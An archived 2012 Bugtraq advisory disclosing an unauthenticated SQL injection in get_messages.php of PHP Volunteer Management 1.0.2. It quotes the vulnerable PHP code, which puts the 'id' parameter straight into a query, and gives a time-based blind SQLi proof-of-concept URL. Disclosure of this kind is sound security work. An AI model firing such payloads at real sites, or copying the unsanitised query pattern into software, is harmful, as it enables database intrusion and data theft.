lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sat, 28 Apr 2012 05:48:05 GMT
From: ariosrandy@...il.com
To: bugtraq@...urityfocus.com
Subject: PHP Volunteer Management (get_messages.php) SQL Injection
 Vulnerabilities

# Title: PHP Volunteer Management (get_messages.php) SQL Injection Vulnerabilities
# 
# Author: eidelweiss
# Twitter: @AriosRandy
# Website: www.eidelweiss.info
# Software Site: https://sourceforge.net/projects/phpvolunteer/
# Version: 1.0.2
# Category: webapp (php)
# Greetz: Devilzc0de, exploit-db, G13 (first vuln Disclose http://www.exploit-db.com/exploits/18788/) and YOU !!!
 
##### ToC #####
 
0x01 Description
0x02 vuln c0de
 
##### 0x01 Description #####
 
This is a PHP Volunteer Management software. Keep track of Volunteer
hours worked and location assignments. This system is built on
PHP/MySql.
 
##### 0x02 vuln c0de #####
 
---------------Vulnerability-------------------

get_messages.php

==
<?php
	define('INCLUDE_CHECK',true);
include '../../../config/connect.php';
$id = $_GET['id'];
$query = "SELECT * FROM messages, volunteers WHERE message_to_id = '$id' AND message_from_id = volunteer_id ORDER BY message_state, message_id";
$mysql_result = mysql_query($query);
$result = array();
while ($row = mysql_fetch_assoc($mysql_result)) {
   $result[] = $row;
}
$data = json_encode($result);

print_r($data);
?>
==
 
The 'id' parameter is vulnerable to SQL Injection.  No authentication is needed.
 
----------Exploit-----------------------------------
 
http://localhost/mods/messages/data/get_messages.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10
 
------------PoC---------------------------
 
http://localhost/mods/messages/data/get_messages.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10
 
##### E0F #####

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ